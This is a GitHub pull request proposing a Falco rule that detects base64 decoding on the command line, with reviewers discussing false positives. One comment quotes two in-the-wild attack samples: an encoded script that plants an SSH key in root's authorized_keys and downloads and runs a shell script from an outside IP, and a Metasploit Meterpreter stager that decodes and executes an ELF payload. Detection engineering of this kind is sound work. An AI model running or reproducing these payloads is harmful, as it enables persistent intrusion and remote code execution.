### PR TITLE
rule(falco_rules): base64 rule

### PR DESCRIPTION
**Pull request by nicklangsysdig**
Signed-off-by: Nicholas Lang <nicholas.lang@sysdig.com>

**What type of PR is this?**

/kind rule-create

**Any specific area of the project related to this PR?**

/area rules

**What this PR does / why we need it**:

It's a new rule to detect the use of various base64 utilities on the command line. 
It catches:
`base64 -d ....`
`python -c "import base64; base64.b64decode(..."`
and the like.

**Which issue(s) this PR fixes**:
Fixes #
**Special notes for your reviewer**:
The output format can be changed, right now it is not very descriptive.
**Does this PR introduce a user-facing change?**:

```release-note
rule(Base64 on Command Line): new rule created to detect various usages of base64 utilities on the command line
```

### CODE REVIEW

**Comment by nicklangsysdig** [comment]
An example of an attack on a container in the wild, using base64: ```bash -c echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKbWtkaXIgLXAgL3Jvb3QvLnNzaApjaGF0dHIgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsOyB0bnRyZWNodCAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IGljaGRhcmYgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsCmNhdCAvdG1wL1RlYW1UTlQucHViID4+IC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCmNhdCAvdG1wL1RlYW1UTlQucHViID4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMyCnJtIC1mIC90bXAvVGVhbVROVC5wdWIKCgpzc2ggLW9TdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLW9CYXRjaE1vZGU9eWVzIC1vQ29ubmVjdFRpbWVvdXQ9NSAtaSAvdG1wL1RlYW1UTlQgcm9vdEAxMjcuMC4wLjEgIihjdXJsIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8Y2QxIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8d2dldCAtcSAtTy0gaHR0cDovLzEwNC4xOTIuODIuMTM4L3MzZjEwMTUvYi9hLnNofHx3ZDEgLXEgLU8tIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaCl8YmFzaCIKCnJtIC1mIC90bXAvVGVhbVROVA== | base64 -d | bash ```

The Metasploit Meterpreter payload's command-stager also uses base64 to establish access:
```sh -c echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgAwOTRb1rJRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/LZzhr.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/qHGHd' < '/tmp/LZzhr.b64' ; chmod +x '/tmp/qHGHd' ; '/tmp/qHGHd' ; rm -f '/tmp/qHGHd' ; rm -f '/tmp/LZzhr.b64'```

**Comment by leogr** [comment]
> I believe (and have seen) that there are many more (both in frequency and variety) malicious use-cases of `base64` occurring in a Falco-deployed environment than benign. This rule is currently deployed in an environment with many different typical production services, with few false positives. Do you have any benign examples that you suggest I add as exceptions to this rule?

I can't think all legit cases, because `base64` is so versatile that you can use it for almost everything. Just to give you an example in the Falco code base :point_down: 

https://github.com/falcosecurity/falco/blob/a5d3663c75f4a1553edb974da07e2b44af7eb3e4/.circleci/config.yml#L333


Anyway, just a friendly reminder: you have to fix the commit [sign-off](https://github.com/falcosecurity/.github/blob/master/CONTRIBUTING.md#developer-certificate-of-origin), otherwise we cannot review your PR.

**Comment by Kaizhe** [comment]
> > I believe (and have seen) that there are many more (both in frequency and variety) malicious use-cases of `base64` occurring in a Falco-deployed environment than benign. This rule is currently deployed in an environment with many different typical production services, with few false positives. Do you have any benign examples that you suggest I add as exceptions to this rule?
> 
> I can't think all legit cases, because `base64` is so versatile that you can use it for almost everything. Just to give you an example in the Falco code base 👇
> 
> https://github.com/falcosecurity/falco/blob/a5d3663c75f4a1553edb974da07e2b44af7eb3e4/.circleci/config.yml#L333
> 
> PS A friendly reminder: you have to fix the commit [sign-off](https://github.com/falcosecurity/.github/blob/master/CONTRIBUTING.md#developer-certificate-of-origin), otherwise we cannot review your PR. The sign-off line 👇 must be included in the commit message (not just in the PR description) `Signed-off-by: Nicholas Lang <nicholas.lang@sysdig.com>`

It's hard to determine the intention behind the tool usage like `base64`. We do have interests in others tools for debugging or tracing purpose like `tcpdump` and `nc`. For tools like `grep` which I consider it is also a common tool, we had a rule to detect specific cases for grepping secret pattern.

**Pull request closed without merging**
